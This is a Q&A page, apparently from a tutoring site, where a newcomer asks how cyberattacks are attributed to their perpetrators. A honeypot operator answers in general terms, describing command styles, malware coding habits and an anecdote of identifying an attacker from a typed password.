Neophyte here. I didn\'t find much googling around, so I was hoping maybe someon

Question

Neophyte here. I didn't find much googling around, so I was hoping maybe someone here could point me in the right direction towards some literature that discusses this in more depth.

It's increasingly common to see major attacks on governments and corporations attributed to a specific country or group. Typically we don't know for certain, but it's at least suspected.

Given the general anonymity of the internet and the ability to hide behind proxies, exactly how do security experts go about determining exactly who perpetrated an attack?

Thanks in advance.

Explanation / Answer

As someone who runs my own honeypots and defends a corporation, I can tell you that any attack leaves fingerprints. Styles of commands or command sequence, coding style of malware, as well as the paths used by attackers can all point in a direction of an attacker.

For example, I was able to positively identify someone trapped in my honeypot because they used their real name as their password (they didn't know I was recording their keystrokes). Using various correlation methods, I was able to attribute the pseudonym they were using on the site they used to distribute malware to their name, including finding out that they used the pseudonym on a single's site 2 years ago that they had deleted (but Google's long memory did not forget).

Once you start studying live attacks, you can really start to see the people "behind the keystrokes" and that's one reason why I continue to operate honeypots. I think I can tell whether an attacker is Asian or Eastern European, simply by their methods, and not by their IP. If I had enough data from a known attacker, I believe I would be able to recognize their actions in a new environment.

Related Questions

Navigate

• Browse (All)
• Browse N
• Subjects

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.